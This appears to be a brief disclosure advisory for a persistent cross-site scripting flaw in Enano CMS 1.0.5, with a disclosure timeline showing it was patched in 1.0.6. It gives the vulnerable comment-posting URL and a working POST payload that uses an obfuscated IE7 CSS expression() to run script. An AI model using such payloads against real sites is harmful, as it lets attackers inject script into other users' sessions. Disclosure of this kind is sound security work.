Enenano CMS version 1.0.5 suffers from a persistent cross site scripting vulnerability.
39100a5902f6ef9df37d19aa3b0387f1b03d573ce9c77ff3abcd55db4d16c781
Enano 1.0.5 persistent XSS (IE7, numeric)
http://enanocms.org
http://site/enano-1.0.5/index.php?title=Main_Page&do=comments&sub=postcomment
POST: name=XSS&subj=TEST&text=%3C/xss/*-*/style=xss:e/**/xpression(alert(000))%3E
Authors notified: Jan 16
Patch 1.0.6: Jan 17
Public: Jan 23
http://nukeit.org